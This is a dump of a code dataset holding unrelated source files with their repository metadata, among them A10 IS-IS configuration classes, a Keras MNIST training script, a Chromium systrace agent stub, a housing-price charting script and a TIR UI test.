self.key_chain_list = []
self.mode_list = []
self.send_only_list = []
for keys, value in kwargs.items():
setattr(self,keys, value)
class WideMetricList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param wide_metric: {"description": "Configure the wide metric for interface", "format": "number", "default": 10, "maximum": 16777214, "minimum": 1, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Apply metric to level-1 links; 'level-2': Apply metric to level-2 links; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "wide-metric-list"
self.DeviceProxy = ""
self.wide_metric = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class HelloIntervalList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param hello_interval: {"description": "Set Hello interval in seconds (Hello interval value)", "format": "number", "default": 10, "maximum": 65535, "minimum": 1, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello-interval for level-1 IIHs; 'level-2': Specify hello-interval for level-2 IIHs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "hello-interval-list"
self.DeviceProxy = ""
self.hello_interval = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class HelloMultiplierList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param hello_multiplier: {"description": "Set multiplier for Hello holding time (Hello multiplier value)", "format": "number", "default": 3, "maximum": 100, "minimum": 2, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello multiplier for level-1 IIHs; 'level-2': Specify hello multiplier for level-2 IIHs; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "hello-multiplier-list"
self.DeviceProxy = ""
self.hello_multiplier = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class MetricList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param metric: {"description": "Configure the metric for interface (Default metric)", "format": "number", "default": 10, "maximum": 63, "minimum": 1, "type": "number"}
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Apply metric to level-1 links; 'level-2': Apply metric to level-2 links; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "metric-list"
self.DeviceProxy = ""
self.metric = ""
self.level = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class CsnpIntervalList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param level: {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Speficy interval for level-1 CSNPs; 'level-2': Specify interval for level-2 CSNPs; ", "format": "enum"}
:param csnp_interval: {"description": "Set CSNP interval in seconds (CSNP interval value)", "format": "number", "default": 10, "maximum": 65535, "minimum": 1, "type": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "csnp-interval-list"
self.DeviceProxy = ""
self.level = ""
self.csnp_interval = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Isis(A10BaseClass):
"""Class Description::
ISIS.
Class isis supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param priority_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"priority": {"description": "Set priority for Designated Router election (Priority value)", "format": "number", "default": 64, "maximum": 127, "minimum": 0, "type": "number"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify priority for level-1 routing; 'level-2': Specify priority for level-2 routing; ", "format": "enum"}}}]}
:param retransmit_interval: {"description": "Set per-LSP retransmission interval (Interval between retransmissions of the same LSP (seconds))", "format": "number", "default": 5, "optional": true, "maximum": 65535, "minimum": 0, "type": "number"}
:param hello_interval_minimal_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"hello-interval-minimal": {"default": 0, "type": "number", "description": "Set Hello holdtime 1 second, interval depends on multiplier", "format": "flag"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello-interval for level-1 IIHs; 'level-2': Specify hello-interval for level-2 IIHs; ", "format": "enum"}}}]}
:param network: {"optional": true, "enum": ["broadcast", "point-to-point"], "type": "string", "description": "'broadcast': Specify IS-IS broadcast multi-access network; 'point-to-point': Specify IS-IS point-to-point network; ", "format": "enum"}
:param lsp_interval: {"description": "Set LSP transmission interval (LSP transmission interval (milliseconds))", "format": "number", "default": 33, "optional": true, "maximum": 4294967295, "minimum": 1, "type": "number"}
:param padding: {"default": 1, "optional": true, "type": "number", "description": "Add padding to IS-IS hello packets", "format": "flag"}
:param password_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"password": {"minLength": 1, "maxLength": 254, "type": "string", "description": "Configure the authentication password for interface", "format": "string-rlx"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify password for level-1 PDUs; 'level-2': Specify password for level-2 PDUs; ", "format": "enum"}}}]}
:param wide_metric_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "wide-metric": {"description": "Configure the wide metric for interface", "format": "number", "default": 10, "maximum": 16777214, "minimum": 1, "type": "number"}, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Apply metric to level-1 links; 'level-2': Apply metric to level-2 links; ", "format": "enum"}}}]}
:param hello_interval_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "hello-interval": {"description": "Set Hello interval in seconds (Hello interval value)", "format": "number", "default": 10, "maximum": 65535, "minimum": 1, "type": "number"}, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello-interval for level-1 IIHs; 'level-2': Specify hello-interval for level-2 IIHs; ", "format": "enum"}}}]}
:param circuit_type: {"description": "'level-1': Level-1 only adjacencies are formed; 'level-1-2': Level-1-2 adjacencies are formed; 'level-2-only': Level-2 only adjacencies are formed; ", "format": "enum", "default": "level-1-2", "type": "string", "enum": ["level-1", "level-1-2", "level-2-only"], "optional": true}
:param hello_multiplier_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "hello-multiplier": {"description": "Set multiplier for Hello holding time (Hello multiplier value)", "format": "number", "default": 3, "maximum": 100, "minimum": 2, "type": "number"}, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Specify hello multiplier for level-1 IIHs; 'level-2': Specify hello multiplier for level-2 IIHs; ", "format": "enum"}}}]}
:param metric_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"metric": {"description": "Configure the metric for interface (Default metric)", "format": "number", "default": 10, "maximum": 63, "minimum": 1, "type": "number"}, "optional": true, "level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Apply metric to level-1 links; 'level-2': Apply metric to level-2 links; ", "format": "enum"}}}]}
:param csnp_interval_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"level": {"enum": ["level-1", "level-2"], "type": "string", "description": "'level-1': Speficy interval for level-1 CSNPs; 'level-2': Specify interval for level-2 CSNPs; ", "format": "enum"}, "optional": true, "csnp-interval": {"description": "Set CSNP interval in seconds (CSNP interval value)", "format": "number", "default": 10, "maximum": 65535, "minimum": 1, "type": "number"}}}]}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/interface/ve/{ifnum}/isis`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "isis"
self.a10_url="/axapi/v3/interface/ve/{ifnum}/isis"
self.DeviceProxy = ""
self.priority_list = []
self.retransmit_interval = ""
self.hello_interval_minimal_list = []
self.mesh_group = {}
self.network = ""
self.bfd_cfg = {}
self.lsp_interval = ""
self.padding = ""
self.password_list = []
self.authentication = {}
self.wide_metric_list = []
self.hello_interval_list = []
self.circuit_type = ""
self.hello_multiplier_list = []
self.metric_list = []
self.csnp_interval_list = []
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
| [
"doug@parksidesoftware.com"
] | doug@parksidesoftware.com |
9c01e7f694d285cbc82aed43b85433d7426fc179 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/224/users/4363/codes/1596_2049.py | 2393618f22d551063f10e697c5ea26d03c3da23b | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # Teste seu codigo aos poucos.
# Nao teste tudo no final, pois fica mais dificil de identificar erros.
# Nao se intimide com as mensagens de erro. Elas ajudam a corrigir seu codigo.
x = int(input("dividendo "))
y = int(input("divisor "))
print(x)
print(y)
print(x//y)
print(x%y) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
55c84f580c92d7a7645d5c9af2c759b950a7f84a | ac64fda7f1bfc92f7897efd60b8f3f0aeb22b4d7 | /syntactic_mutations/mnist_tr/mutants/mutant118.py | c11c9efb905c74722b9130a38af9dbfcb856ee71 | [] | no_license | dlfaults/mutation_operators_evaluation | ea7f33459ba7bcf7d70092d9db8b40f9b338d516 | 7d1ff30e901931a46bf8908e9bb05cae3daa5f0f | refs/heads/master | 2020-12-27T15:45:07.262012 | 2020-02-03T12:22:01 | 2020-02-03T12:22:01 | 237,955,342 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,611 | py | import datetime
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
now = datetime.datetime.now
batch_size = 128
num_classes = 5
epochs = 5
(img_rows, img_cols) = (28, 28)
filters = 32
pool_size = 2
kernel_size = 3
input_shape = (img_rows, img_cols, 1)
def train(model, train, test, num_classes, model_name):
x_train = train[0].reshape((train[0].shape[0],) + input_shape)
x_test = test[0].reshape((test[0].shape[0],) + input_shape)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
y_train = keras.utils.to_categorical(train[1], num_classes)
y_test = keras.utils.to_categorical(test[1], num_classes)
model.compile(loss='categorical_crossentropy', optimizer=\
'adadelta', metrics=\
['accuracy'])
model.fit(x_train, y_train, batch_size=\
batch_size, epochs=\
epochs, verbose=\
1, validation_data=\
(x_test, y_test))
model.save(model_name)
score = model.evaluate(x_test, y_test, verbose=0)
return (score[0], score[1])
def train_model(x_train, y_train, x_test, y_test, model1_name, model2_name):
x_train_lt5 = x_train[y_train < 5]
y_train_lt5 = y_train[y_train < 5]
x_test_lt5 = x_test[y_test < 5]
y_test_lt5 = y_test[y_test < 5]
x_train_gte5 = x_train[y_train >= 5]
y_train_gte5 = y_train[y_train >= 5] - 5
x_test_gte5 = x_test[y_test >= 5]
y_test_gte5 = y_test[y_test >= 5] - 5
feature_layers = [\
Conv2D(filters, kernel_size, padding=\
'valid', input_shape=\
input_shape), \
Activation('relu'), \
Conv2D(filters, kernel_size), \
Activation('relu'), \
MaxPooling2D(pool_size=pool_size), \
Dropout(0.25), \
Flatten()]
classification_layers = [\
Dense(128), \
Activation('relu'), \
Dropout(0.5), \
Dense(num_classes), \
Activation('softmax')]
model = Sequential(feature_layers + classification_layers)
(loss1, acc1) = train(model,
(x_train_lt5, y_train_lt5),
(x_test_lt5, y_test_lt5), num_classes, model1_name)
for l in feature_layers:
l.trainable = False
(loss2, acc2) = train(model,
(x_train_gte5, y_train_gte5),
(x_test_gte5, y_test_gte5), num_classes, model2_name)
pass | [
"gunel71@gmail.com"
] | gunel71@gmail.com |
870f58223b2bf1ea451ad5f430647e0c076b21c0 | 38c10c01007624cd2056884f25e0d6ab85442194 | /third_party/catapult/systrace/systrace/systrace_agent.py | 376d4f2507b0a8d04b8fa336d1c78567ee61812b | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0"
] | permissive | zenoalbisser/chromium | 6ecf37b6c030c84f1b26282bc4ef95769c62a9b2 | e71f21b9b4b9b839f5093301974a45545dad2691 | refs/heads/master | 2022-12-25T14:23:18.568575 | 2016-07-14T21:49:52 | 2016-07-23T08:02:51 | 63,980,627 | 0 | 2 | BSD-3-Clause | 2022-12-12T12:43:41 | 2016-07-22T20:14:04 | null | UTF-8 | Python | false | false | 1,647 | py | # Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class SystraceAgent(object):
"""The base class for systrace agents.
A systrace agent contains the command-line options and trace categories to
capture. Each systrace agent has its own tracing implementation.
"""
def __init__(self, options, categories):
"""Initialize a systrace agent.
Args:
options: The command-line options.
categories: The trace categories to capture.
"""
self._options = options
self._categories = categories
def start(self):
"""Start tracing.
"""
raise NotImplementedError()
def collect_result(self):
"""Collect the result of tracing.
This function will block while collecting the result. For sync mode, it
reads the data, e.g., from stdout, until it finishes. For async mode, it
blocks until the agent is stopped and the data is ready.
"""
raise NotImplementedError()
def expect_trace(self):
"""Check if the agent is returning a trace or not.
This will be determined in collect_result().
Returns:
Whether the agent is expecting a trace or not.
"""
raise NotImplementedError()
def get_trace_data(self):
"""Get the trace data.
Returns:
The trace data.
"""
raise NotImplementedError()
def get_class_name(self):
"""Get the class name
The class name is used to identify the trace type when the trace is written
to the html file
Returns:
The class name.
"""
raise NotImplementedError()
| [
"zeno.albisser@hemispherian.com"
] | zeno.albisser@hemispherian.com |
49b046dd8aff3875402eaf5275f060f0b3b0174f | 1e6681ca2569c3de32db2d3b1c957652f8d8ccb3 | /xiaoqu_to_chart.py | f9b5ad6726ff6fff1cac6d9a26eed030e88e9e19 | [] | no_license | re0phimes/lianjia-beike-spider | d48e5bb05af9c8557ff32f9ca54746c4649d6281 | cb4ff13b6145c5169263e486e03d9fbca52450fe | refs/heads/master | 2020-04-02T17:21:11.770535 | 2018-10-24T23:42:44 | 2018-10-24T23:42:44 | 154,654,321 | 1 | 0 | null | 2018-10-25T10:45:10 | 2018-10-25T10:45:10 | null | UTF-8 | Python | false | false | 2,380 | py | #!/usr/bin/env python
# coding=utf-8
# author: zengyuetian
import webbrowser
import pandas as pd
import numpy as np
from pyecharts import Bar
import webbrowser as web
import os
import time
from lib.utility.version import PYTHON_3
if __name__ == '__main__':
try:
if PYTHON_3:
os.system("ps aux | grep python | grep http.server | grep -v grep | awk '{print $2}' | xargs kill")
os.system("python -m http.server 8080 & > /dev/null 2>&1 ")
else:
os.system("ps aux | grep python | grep SimpleHTTPServer | grep -v grep | awk '{print $2}' | xargs kill")
os.system("python -m SimpleHTTPServer 8080 & > /dev/null 2>&1 ")
except Exception as e:
pass
# 注意,已经将分割符号转换成分号,因为有的小区名中有逗号
df = pd.read_csv("xiaoqu.csv", encoding="utf-8", sep=";")
# 打印总行数
print("row number is {0}".format(len(df.index)))
# 过滤房价为0的无效数据
df = df[df.price > 0]
# # 去除重复行
# df = df.drop_duplicates()
print("row number is {0}".format(len(df.index)))
####################################################
# 最贵的小区排名
####################################################
df.sort_values("price", ascending=False, inplace=True)
num = 3
print(df.head(num))
city = df["city_ch"][0]
xqs = df["xiaoqu"][0:num]
prices = df["price"][0:num]
bar = Bar("{0}小区均价".format(city))
bar.add("小区均价前{0}名".format(num), xqs, prices, is_stack=True, is_label_show=True)
bar.render(path="xiaoqu.html")
####################################################
# 区县均价排名
####################################################
district_df = df.groupby('district').mean()
district_df = district_df.round(0)
district_df.sort_values("price", ascending=False, inplace=True)
print(district_df)
districts = district_df.index
prices = district_df["price"]
bar = Bar("{0}区县均价".format(city))
bar.add("区县均价排名", districts, prices, is_stack=True, is_label_show=True)
bar.render(path="district.html")
web.open("http://localhost:8080/xiaoqu.html", new=0, autoraise=True)
web.open("http://localhost:8080/district.html", new=0, autoraise=True)
# 确保页面打开
time.sleep(15)
| [
"ijumper@163.com"
] | ijumper@163.com |
55093be6c5bd69ff9bea241af4fdc6ab747a5870 | 3e0c57628c39e5042ed068451608a33b5edcf5df | /codex-py/test/config/demo_propmap.py | 69ec9605243caa7804fa759421b722ca3d5f7543 | [
"Apache-2.0"
] | permissive | egustafson/home-sensors | 5bd3c0f51be9a0a1f360ef41b45cbdfb3069286f | 232b36fe6fa2a2e3bce1391a91dffa192f17b835 | refs/heads/master | 2023-05-10T17:12:10.991008 | 2020-01-03T23:57:56 | 2020-01-03T23:57:56 | 141,070,153 | 0 | 0 | Apache-2.0 | 2023-05-01T20:20:24 | 2018-07-16T01:03:59 | Python | UTF-8 | Python | false | false | 1,030 | py | # -*- coding: utf-8 -*-
from codex.config.prop import PropMap
from codex.config.prop import PropList
tmap = { "k1": "v1",
"k2": "v2",
"k3": {"k3a": "v3a"},
"k4": {"k4a": {"k4b": "v3b"}},
# "k5": {"K$5": "v5a"},
# "k6.k6a": "v6a",
}
pmap = PropMap(tmap)
#print("tmap: {}".format(tmap))
#print("pmap: {}".format(pmap))
pmap.dump()
print("")
print("pmap is a {}".format(pmap.__class__))
print("pmap[k3] is a {}".format(pmap["k3"].__class__))
pmap["k9.k9a.k9b"] = "v9"
print("index k1: {}".format(pmap["k1"]))
# print("index kk: {}".format(pmap["kk"]))
print("index k3.k3a: {}".format(pmap["k3.k3a"]))
print("index k4.k4a.k4b: {}".format(pmap["k4.k4a.k4b"]))
try:
print("index k1: {}".format(pmap["k1"]))
except KeyError as ex:
print("ex: {}".format(ex))
print("pmap.items():")
for (k,v) in pmap.items():
print(" {}: {}".format(k, v))
print("pmap.flatten():")
flat = pmap.flatten()
for (k,v) in flat:
print(" {}: {}".format(k, v))
print("")
pmap.dump()
| [
"eg-git@elfwerks.org"
] | eg-git@elfwerks.org |
f7e67e7c06dad3c32e3885a4e2fbdb29ab4a0a3b | 7986ec6498e3f93967fa9bfe2b6a9d4056138293 | /Protheus_WebApp/Modules/SIGATMK/TMKA061TESTCASE.py | 7e8672d16dbf8b96c9b30b4da09dadec36a8bae0 | [
"MIT"
] | permissive | HelenaAdrignoli/tir-script-samples | 7d08973e30385551ef13df15e4410ac484554303 | bb4f4ab3a49f723216c93f66a4395e5aa328b846 | refs/heads/master | 2023-02-21T11:26:28.247316 | 2020-04-28T16:37:26 | 2020-04-28T16:37:26 | 257,304,757 | 0 | 0 | MIT | 2020-04-20T14:22:21 | 2020-04-20T14:22:20 | null | UTF-8 | Python | false | false | 2,189 | py | from tir import Webapp
import unittest
class TMKA061(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup('SIGATMK','13/04/2020','T1','D MG 01 ','13')
inst.oHelper.Program('TMKA061')
def test_TMKA061_001(self):
self.oHelper.SetButton("Outras Ações","Assistente")
self.oHelper.SetButton("OK")
self.oHelper.ClickLabel("Lista de Contato")
self.oHelper.SetButton("Avançar")
self.oHelper.ClickLabel("Vendas")
self.oHelper.SetButton("Avançar")
self.oHelper.ClickLabel("1 - Clientes")
self.oHelper.SetButton("Avançar")
self.oHelper.SetValue("Data Ultima Compra ?", "")
self.oHelper.SetValue("Data Ultima Visita ?", "")
self.oHelper.SetButton("OK")
self.oHelper.ClickLabel("Detalhada")
self.oHelper.SetButton("Avançar")
self.oHelper.SetValue("Nível do Contato ?", "")
self.oHelper.SetValue("Perfil do Contato ?", "Nao Avalia")
self.oHelper.SetValue("Ligacões não executadas ?", "Nao Considera")
self.oHelper.SetValue("A partir de quando ?", "31/12/2004")
self.oHelper.SetValue("Ignora os dias da semana ?", "")
self.oHelper.SetButton("OK")
self.oHelper.ClickLabel("Voz")
self.oHelper.SetButton("Avançar")
self.oHelper.ClickLabel("Comercial 1")
self.oHelper.SetButton("Avançar")
self.oHelper.ClickLabel("Lista Aberta")
self.oHelper.SetButton("Avançar")
self.oHelper.SetValue("Nome Lista", "Lista Contatos Vendas- TIR")
self.oHelper.SetValue("Servico SLA", "")
self.oHelper.SetKey("TAB")
self.oHelper.SetValue("Número máximo de Itens por Lista:", "000999")
self.oHelper.SetButton("Avançar")
self.oHelper.SetButton("Avançar")
self.oHelper.SetButton("Avançar")
self.oHelper.SetButton("Finalizar")
self.oHelper.SetButton("Sim")
self.oHelper.SetButton("OK")
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main() | [
"hadrignoli@gmail.com"
] | hadrignoli@gmail.com |
ac807123982efe2f51ec607a6061f29be805c9f8 | 8ffb0b95591bd82df42335315b9595274740aca4 | /models/earthworm/leftover/earthworm_output.py | e0acabafbc13c8fffc4c7805920a5d9629973909 | [] | no_license | batwalrus76/ubertool_eco | 507cf5ef5a0f91f3a36a03d26d80783c3b517e79 | ed2863e37ee6066ccdfafa20f6fec3ba4f75f2d1 | refs/heads/master | 2021-01-18T10:23:27.810117 | 2015-03-24T14:50:05 | 2015-03-24T14:50:05 | 32,412,353 | 0 | 0 | null | 2015-03-17T18:30:11 | 2015-03-17T18:30:10 | null | UTF-8 | Python | false | false | 2,473 | py | # -*- coding: utf-8 -*-
import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from uber import uber_lib
import numpy as np
import cgi
import cgitb
cgitb.enable()
from earthworm import earthworm_model, earthworm_tables
import sys
sys.path.append("../earthworm")
from uber import uber_lib
import rest_funcs
import logging
logger = logging.getLogger('earthworm')
class earthwormOutputPage(webapp.RequestHandler):
def post(self):
form = cgi.FieldStorage()
k_ow = float(form.getvalue('k_ow'))
l_f_e = float(form.getvalue('l_f_e'))
c_s = float(form.getvalue('c_s'))
k_d = float(form.getvalue('k_d'))
p_s = float(form.getvalue('p_s'))
c_w = float(form.getvalue('c_w'))
m_w = float(form.getvalue('m_w'))
p_e = float(form.getvalue('p_e'))
earthworm_obj = earthworm_model.earthworm(True,True,k_ow,l_f_e,c_s,k_d,p_s,c_w,m_w,p_e)
# logger.info(vars(earthworm_obj))
text_file = open('earthworm/earthworm_description.txt','r')
x = text_file.read()
templatepath = os.path.dirname(__file__) + '/../templates/'
ChkCookie = self.request.cookies.get("ubercookie")
html = uber_lib.SkinChk(ChkCookie, "Earthworm Output")
html = html + template.render(templatepath + '02uberintroblock_wmodellinks.html', {'model':'earthworm','page':'output'})
html = html + template.render (templatepath + '03ubertext_links_left.html', {})
html = html + template.render(templatepath + '04uberoutput_start.html', {
'model':'earthworm',
'model_attributes':'Earthworm Output'})
html = html + earthworm_tables.timestamp(earthworm_obj)
html = html + earthworm_tables.table_all(earthworm_obj)
html = html + template.render(templatepath + 'export.html', {})
html = html + template.render(templatepath + '04uberoutput_end.html', {})
html = html + template.render(templatepath + '06uberfooter.html', {'links': ''})
rest_funcs.save_dic(html, earthworm_obj.__dict__, "earthworm", "single")
self.response.out.write(html)
app = webapp.WSGIApplication([('/.*', earthwormOutputPage)], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
| [
"hongtao510@gmail.com"
] | hongtao510@gmail.com |
9498f268b62d247bf1b847b778e43a909832d998 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/manent.py | 273dc358a4c9e4ac188f99a2bae002f7951f660d | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 43 | py | ii = [('BailJD3.py', 3), ('MereHHB.py', 4)] | [
"prabhjyotsingh95@gmail.com"
] | prabhjyotsingh95@gmail.com |
cda5bf2dba75c987106ec62af214b96ca5667188 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /870.advantage-shuffle.python3.py | 362f8e0a67857cb39a5b44204dba1afd05679778 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | #
# [901] Advantage Shuffle
#
# https://leetcode.com/problems/advantage-shuffle/description/
#
# algorithms
# Medium (40.29%)
# Total Accepted: 7.5K
# Total Submissions: 18.5K
# Testcase Example: '[2,7,11,15]\n[1,10,4,11]'
#
# Given two arrays A and B of equal size, the advantage of A with respect to B
# is the number of indices i for which A[i] > B[i].
#
# Return any permutation of A that maximizes its advantage with respect to
# B.
#
#
#
#
# Example 1:
#
#
# Input: A = [2,7,11,15], B = [1,10,4,11]
# Output: [2,11,7,15]
#
#
#
# Example 2:
#
#
# Input: A = [12,24,8,32], B = [13,25,32,11]
# Output: [24,32,8,12]
#
#
#
#
# Note:
#
#
# 1 <= A.length = B.length <= 10000
# 0 <= A[i] <= 10^9
# 0 <= B[i] <= 10^9
#
#
#
#
#
class Solution:
def advantageCount(self, A, B):
"""
:type A: List[int]
:type B: List[int]
:rtype: List[int]
"""
| [
"richnakasato@hotmail.com"
] | richnakasato@hotmail.com |
99f97c108ff2e6878b5fa011f5843c00586d9cbf | 6136e6506d55ad37b3103e5e2f100ca7f2922bb4 | /python3.7/语感100题/81-90/90.py | a9890ecc32a3ed5b8d0d5ea5319da76df8e67f16 | [] | no_license | Ckongfu/mooc | 8911fd1112415f70a37649e48007c3ee5bfef5ba | ca0e2f4a802082e5301f0a65943d1147bb5a3b98 | refs/heads/master | 2021-05-16T18:44:36.234274 | 2020-12-24T06:43:33 | 2020-12-24T06:43:33 | 250,424,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | #计算5的3.5方和9的立方根
print(pow(5,3.5))
print(pow(27,(1/3)))
| [
"zouguannan0@163.com"
] | zouguannan0@163.com |
89f4deab11dc827abf63d32d7e4af23a4e08f4ab | b031132a8ca2727827f6b1bb75f5839d327885bf | /bookworm/api/forms.py | 8b7049f862db44ea99c9d7d43892d1a1cb2ecc0a | [
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | erochest/threepress-rdfa | 3441ba9f272bad439b9689968cd1f668fae5c4f6 | f07e10da8a4927ab21084f4ba015d6567e665cae | refs/heads/master | 2021-07-16T21:24:00.356147 | 2011-06-10T20:42:14 | 2011-06-10T20:42:14 | 1,845,226 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | from django import forms
class APIUploadForm(forms.Form):
epub_data = forms.FileField()
api_key = forms.CharField(max_length=255)
| [
"none@none"
] | none@none |
4d90b9ba43f5cf53dd31827df98d8a68ea8fa9cb | acf7457d3a799cb9bff12686d2d616688bcd4b5b | /packages/python/plotly/plotly/validators/scattercarpet/marker/_anglesrc.py | 3d469a500245c6cb620654f07d276ace9b20b460 | [
"MIT"
] | permissive | plotly/plotly.py | f4f61639f08160f16195efc95b5901dc5a937346 | 975a704074f01c078e0fdfa32bdf17130bf89e69 | refs/heads/master | 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 | MIT | 2023-09-08T19:55:32 | 2013-11-21T05:53:08 | Python | UTF-8 | Python | false | false | 424 | py | import _plotly_utils.basevalidators
class AnglesrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="anglesrc", parent_name="scattercarpet.marker", **kwargs
):
super(AnglesrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs,
)
| [
"nicolas@plot.ly"
] | nicolas@plot.ly |
236f18e6d06d06f7411c509b2804609daba2be41 | 0ca5780b8a121b90e2191d7e394e35f49ab68828 | /tools/ratings.py | e6cc4467ebefa6bfa5fde9a97a901f84d3d5d6b0 | [
"MIT"
] | permissive | Ghloin/tweeria | 805091a40a2625f4983b960ccd477af6ffb1c1ba | 5f7cf917a6e08f15cd914c11823dbd81c11b95a1 | refs/heads/master | 2021-01-21T05:59:24.279175 | 2015-04-11T23:49:09 | 2015-04-11T23:49:09 | 33,859,414 | 1 | 0 | null | 2015-04-13T09:22:40 | 2015-04-13T09:22:39 | null | UTF-8 | Python | false | false | 8,313 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This is rating counter
# author: Alex Shteinikov
import __init__
import settings
import time
import random
tweenk_core = settings.core()
tweenk_balance = settings.balance()
import db
import logger
import time
class ratingsCounter:
K1 = 0.02
K2 = 1.5
K_kill = 100
RD = 25
mongo = db.mongoAdapter()
balance = settings.balance()
